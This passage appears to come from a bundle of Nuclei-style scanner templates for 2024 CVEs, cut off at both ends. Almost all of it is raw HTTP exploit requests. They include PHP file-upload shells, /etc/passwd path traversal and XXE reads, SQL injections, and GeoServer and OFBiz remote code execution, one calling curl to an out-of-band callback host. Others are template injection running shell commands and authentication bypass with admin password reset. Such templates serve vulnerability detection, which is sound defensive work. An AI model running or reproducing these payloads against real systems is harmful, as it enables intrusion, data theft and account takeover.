name=\"nmkeyid\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"fleArquivo\"; filename=\"{{filename}}.php\"\n\n<?php echo md5({{num}}); ?>\n-----------------------------QUALITORspaceCVEspace2024space44849\nContent-Disposition: form-data; name=\"cdfilestorage\"\n\n\n-----------------------------QUALITORspaceCVEspace2024space44849--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"parent.showQAlert(\\'Upload\", \"showQAlert\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /html/ad/adfilestorage/request/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-7340","info":{"name":"W&B Weave Server - Remote Arbitrary File Leak","severity":"high"},"requests":[{"raw":["GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-36401","info":{"name":"GeoServer RCE in Evaluating Property Name Expressions","severity":"critical"},"requests":[{"raw":["GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"extractors":[{"type":"regex","name":"typename","part":"body","group":1,"regex":["typeName=([^&\\]]+)"],"internal":true}]},{"raw":["@timeout 20s\nGET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"content_type","words":["application/xml"]}]}]},{"id":"CVE-2024-29269","info":{"name":"Telesquare TLR-2005KSH  - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>","</xml>","Ethernet","inet"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24809","info":{"name":"Traccar - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /api/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{name}}\", \"email\": \"{{email}}\", \"password\": \"{{password}}\", \"totpKey\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"administrator\":","\"fixedEmail\""],"condition":"and","internal":true}]},{"raw":["POST /api/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;charset=UTF-8\n\nemail={{email}}&password={{password}}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceReadonly\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{unique}}\", \"uniqueId\": \"{{unique}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["\"calendarId\"","\"groupId\":"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"value","internal":true,"json":[".id"]}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"extractors":[{"type":"regex","part":"body","name":"filename","internal":true,"regex":["device\\.([a-zA-Z]+)"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /api/devices/{{value}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": {{value}}, \"attributes\": {\"deviceImage\": \"device.png\"}, \"groupId\": 0, \"calendarId\": 0, \"name\": \"test\", \"uniqueId\": \"{{unique}}/../../../../../opt/traccar/modern\", \"status\": \"offline\", \"lastUpdate\": null, \"positionId\": 0, \"phone\": null, \"model\": null, \"contact\": null, \"category\": null, \"disabled\": false, \"expirationTime\": null}\n"],"matchers":[{"type":"word","part":"body","words":["\"deviceImage\":","\"expirationTime\":"],"condition":"and","internal":true}]},{"raw":["POST /api/devices/{{value}}/image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: image/srHtgGrc\n\n{{str}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]}]},{"id":"CVE-2024-24112","info":{"name":"Exrick XMall - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","MySQLSyntaxErrorException"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28995","info":{"name":"SolarWinds Serv-U - Directory Traversal","severity":"high"},"requests":[{"raw":["GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1\nHost: {{Hostname}}\n","GET /?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"Serv-U\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4358","info":{"name":"Progress Telerik Report Server - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /Startup/Register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUsername={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}\n","POST /Token HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=password&username={{user}}&password={{pass}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains_all(body_2, \"access_token\", \"userName\", \"token_type\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"token","part":"body_2","group":1,"regex":["\"access_token\":\"([A-Z0-9a-z_-]+)\""],"internal":true},{"type":"dsl","dsl":["\"Username: \"+ user","\"Password: \"+ pass"]}]}]},{"id":"CVE-2024-43360","info":{"name":"ZoneMinder - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nGET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body,\"result\\\":\\\"Ok\", \"rows\\\":[\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-22207","info":{"name":"Fastify Swagger-UI - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/documentation/playwright.config.js"],"matchers-condition":"and","matchers":[{"type":"word","words":["module.exports","defineConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3656","info":{"name":"Keycloak < 24.0.5 - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /realms/{{realm}}/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2f{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge={{code_challenge}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"tabid","part":"body","internal":true,"regex":["&tab_id=(\\w+)&"],"group":1}]},{"raw":["GET /realms/{{realm}}/login-actions/authenticate?client_id=security-admin-console&tab_id={{tabid}}&client_data=eyJydCI6ImNvZGUiLCJybSI6InF1ZXJ5Iiwic3QiOiIxIn0= HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"auth_url","part":"body","internal":true,"regex":["\"login.disabled = true; return true;\" action=\"(.*?)\""],"group":1}]},{"raw":["POST {{replace(auth_url,'&amp;','&')}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&credentialId=&\n"],"extractors":[{"type":"dsl","name":"codevalue","internal":true,"dsl":["replace_regex(http_3_location,\".*&code=\",\"\")"]}]},{"raw":["POST /realms/{{realm}}/protocol/openid-connect/token HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\n\ncode={{codevalue}}&grant_type=authorization_code&client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2F{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&code_verifier={{code_verifier}}&\n"],"extractors":[{"type":"json","part":"body","name":"access_token","json":[".access_token"],"internal":true}]},{"raw":["POST /admin/realms/{{realm}}/testLDAPConnection HTTP/1.1\nHost: {{Hostname}}\nauthorization: Bearer {{access_token}}\ncontent-type: application/json\n\n{\n    \"action\": \"testConnection\",\n    \"connectionUrl\": \"ldap://{{interactsh-url}}/\",\n    \"bindDn\": \"cn=admin,dc=example,dc=com\",\n    \"bindCredential\": \"password\",\n    \"useTruststoreSpi\": \"ldapsOnly\",\n    \"connectionTimeout\": \"5000\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")"]},{"type":"word","part":"body","words":["HTTP 403 Forbidden"],"negative":true}]}]},{"id":"CVE-2024-45195","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noutpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard\n","GET /common/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<?xml version=","entity-engine-xml"],"condition":"and"},{"type":"word","part":"content_type_2","words":["text/plain"]}]}]},{"id":"CVE-2024-20419","info":{"name":"Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover","severity":"critical"},"requests":[{"raw":["GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["enabled","redirect"],"condition":"and","internal":true}]},{"raw":["POST /backend/reset_password/generate_code HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\"}\n"],"matchers":[{"type":"word","words":["uid","auth_token"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"auth_token","json":[".auth_token"],"internal":true}]},{"raw":["POST /backend/reset_password HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\",\"auth_token\":\"{{auth_token}}\", \"password\":\"{{password}}\",\"password_confirmation\":\"{{password}}\",\"common_name\":\"\"}\n"],"matchers":[{"type":"word","words":["\"status\":\"OK\""],"condition":"and","internal":true}]},{"raw":["POST /backend/auth/identity/callback HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["session_key","role"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-4577","info":{"name":"PHP CGI - Argument Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"],"body":"<?php echo md5(\"CVE-2024-4577\"); ?>\n","stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["3f2ba4ab3b260f4c2dc61a6fac7c3e8a"]}]}]},{"id":"CVE-2024-41667","info":{"name":"OpenAM<=15.0.3 FreeMarker - Template Injection","severity":"high"},"requests":[{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n"],"matchers":[{"type":"word","part":"body","words":["authId"],"internal":true}],"extractors":[{"type":"regex","name":"authId","part":"body","group":1,"regex":["\"authId\":\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n\n{\"authId\":\"{{authId}}\",\"template\":\"\",\"stage\":\"DataStore1\",\"header\":\"Sign in to OpenAM\",\"infoText\":[\"\",\"\"],\"callbacks\":[{\"type\":\"NameCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"User Name:\"}],\"input\":[{\"name\":\"IDToken1\",\"value\":\"{{username}}\"}]},{\"type\":\"PasswordCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"Password:\"}],\"input\":[{\"name\":\"IDToken2\",\"value\":\"{{password}}\"}]}]}\n"],"matchers":[{"type":"word","part":"body","words":["tokenId"]}],"extractors":[{"type":"kval","name":"csrf","part":"header","internal":true,"kval":["iPlanetDirectoryPro"]}]},{"raw":["GET /openam/realm/RMRealm?RMRealm.tblDataActionHref=/&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession1","part":"body","group":1,"regex":["jato.pageSession=(.*?)\""]}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tabCommon.TabHref=186&jato.pageSession={{pageSession1}}&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession2","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\njato.defaultCommand=%2Fg&jato.pageSession={{pageSession2}}\n"],"extractors":[{"type":"regex","name":"pageSession3","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\n&Agents.tfFilter=*&Agents.tblSearch.PrimarySortNameHiddenField=tblDataName&Agents.tblSearch.PrimarySortOrderHiddenField=ascending&Agents.tblSearch.SecondarySortNameHiddenField=&Agents.tblSearch.SecondarySortOrderHiddenField=&Agents.tblSearch.AdvancedSortNameHiddenField=&Agents.tblSearch.AdvancedSortOrderHiddenField=&Agents.tblButtonAdd=New...&Agents.tblButtonDelete.DisabledHiddenField=true&Agents.tblSearch.SelectionCheckbox0.jato_boolean=false&Agents.tblDataUniversalName=id%3Dou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&Agents.tfGroupFilter=*&Agents.tblSearchGroup.PrimarySortNameHiddenField=tblDataGroupName&Agents.tblSearchGroup.PrimarySortOrderHiddenField=ascending&Agents.tblSearchGroup.SecondarySortNameHiddenField=&Agents.tblSearchGroup.SecondarySortOrderHiddenField=&Agents.tblSearchGroup.AdvancedSortNameHiddenField=&Agents.tblSearchGroup.AdvancedSortOrderHiddenField=&Agents.tblButtonGroupDelete.DisabledHiddenField=true&jato.defaultCommand=%2FbtnSearch&jato.pageSession={{pageSession3}}\n"],"extractors":[{"type":"regex","name":"pageSession4","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/AgentAdd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nAgentAdd.button1=Create&AgentAdd.tfName={{randstr}}&AgentAdd.tfPassword=test&AgentAdd.tfPasswordConfirm=test&jato.defaultCommand=%2Fbutton1&jato.pageSession={{pageSession4}}\n"],"extractors":[{"type":"regex","name":"pageSession5","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tblDataActionHref=id%3D{{randstr}}%2Cou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&jato.pageSession={{pageSession2}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession6","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/GenericAgentProfile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nGenericAgentProfile.button1=+Save+&GenericAgentProfile.agentgroup=&GenericAgentProfile.sunIdentityServerDeviceStatus=Active&GenericAgentProfile.userpassword=&GenericAgentProfile.userpassword_confirm=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientType=Confidential&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.listbox=https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.selectedTextField=https%3A%2F%2Fgithub.com%09https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.listbox=employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=employeenumber%09employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.selectedTextField=code%09code%09token%09token%09id_token%09id_token%09code+token%09code+token%09token+id_token%09token+id_token%09code+id_token%09code+id_token%09code+token+id_token%09code+token+id_token&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.tokenEndPointAuthMethod=client_secret_basic&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwksURI=http%3A%2F%2Fkubernetes.docker.internal%3A8081%2Fopenam%2Foauth2%2Fconnect%2Fjwk_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwks=&GenericAgentProfile.com.forgerock.openam.oauth2provider.sectorIdentifierURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.subjectType=Public&GenericAgentProfile.com.forgerock.openam.oauth2provider.idTokenSignedResponseAlg=HS256&GenericAgentProfile.idTokenEncryptionEnabled.jato_boolean=false&GenericAgentProfile.idTokenEncryptionAlgorithm=RSA1_5&GenericAgentProfile.idTokenEncryptionMethod=A128CBC-HS256&GenericAgentProfile.idTokenPublicEncryptionKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessToken=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientSessionURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientJwtPublicKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAge=600&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAgeEnabled.jato_boolean=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.publicKeyLocation=jwks_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.authorizationCodeLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.refreshTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwtTokenLifeTime=0&GenericAgentProfile.isConsentImplied.jato_boolean=false&jato.pageSession={{pageSession6}}\n"],"matchers":[{"type":"word","part":"body","words":["<div class=\"AlrtMsgTxt\">Profile was updated.</div>"]}]},{"raw":["POST /openam/json/realms/root/realm-config/services/oauth-oidc?_action=create HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\nConnection: keep-alive\n\n{}\n"],"matchers":[{"type":"word","part":"body","words":["message","reason","code"],"condition":"and"}]},{"raw":["PUT /openam/json/realms/root/realm-config/services/oauth-oidc HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\n\n{\"advancedOAuth2Config\":{\"customLoginUrlTemplate\":\"<#assign value=\\\"freemarker.template.utility.Execute\\\"?new()>${value(\\\"head -n 1 /etc/passwd\\\")}\"},\"deviceCodeConfig\":{\"completionUrl\":\"\",\"verificationUrl\":\"\",\"devicePollInterval\":5,\"deviceCodeLifetime\":300},\"oidcSsoProviderEnabled\":false,\"_id\":\"\",\"_type\":{\"_id\":\"oauth-oidc\",\"name\":\"OAuth2 Provider\",\"collection\":false}}\n"],"matchers":[{"type":"word","part":"body","words":["advancedOAuth2Config","customLoginUrlTemplate"],"condition":"and"}]},{"raw":["GET /openam/oauth2/realms/root/authorize?client_id={{randstr}}&scope=employeenumber&redirect_uri=https://github.com&response_type=code&csrf={{csrf}}&max_age=200 HTTP/1.1\nHost: {{Hostname}}\n"],"disable-cookie":true,"matchers":[{"type":"dsl","dsl":["contains(urldecode(location),\"root:x:0:0:\")"]}]}]},{"id":"CVE-2024-6893","info":{"name":"Journyx - XML External Entities Injection (XXE)","severity":"high"},"requests":[{"raw":["POST /jtcgi/soap_cgi.pyc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM \"file:///etc/passwd\">]><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>{{pass}}</curpwd><newpwd>{{pass}}</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalid password for user"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-2330","info":{"name":"NS-ASG Application Security Gateway 6.3 - Sql Injection","severity":"medium"},"requests":[{"raw":["POST /protocol/index.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njsoncontent={\"protocolType\":\"addmacbind\",\"messagecontent\":[\"{\\\"BandIPMacId\\\":\\\"1\\\",\\\"IPAddr\\\":\\\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\\\",\\\"MacAddr\\\":\\\"\\\",\\\"DestIP\\\":\\\"\\\",\\\"DestMask\\\":\\\"255.255.255.0\\\",\\\"Description\\\":\\\"Sample+Description\\\"}\"]}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"XPATH syntax error:\",\"alert\") && contains(header,\"text/html\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["XPATH syntax error: '([~0-9.]+)'"]}]}]},{"id":"CVE-2024-0235","info":{"name":"EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"_user_role=administrator","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@","status\":\"good","value=","\"content\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5936","info":{"name":"PrivateGPT < 0.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/file=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-36104","info":{"name":"Apache OFBiz - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=\\u0074\\u0068\\u0072\\u006f\\u0077\\u0020\\u006e\\u0065\\u0077\\u0020\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0028\\u0027\\u0069\\u0064\\u0027\\u002e\\u0065\\u0078\\u0065\\u0063\\u0075\\u0074\\u0065\\u0028\\u0029\\u002e\\u0074\\u0065\\u0078\\u0074\\u0029\\u003b\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=\\d+\\(([^)]+)\\) 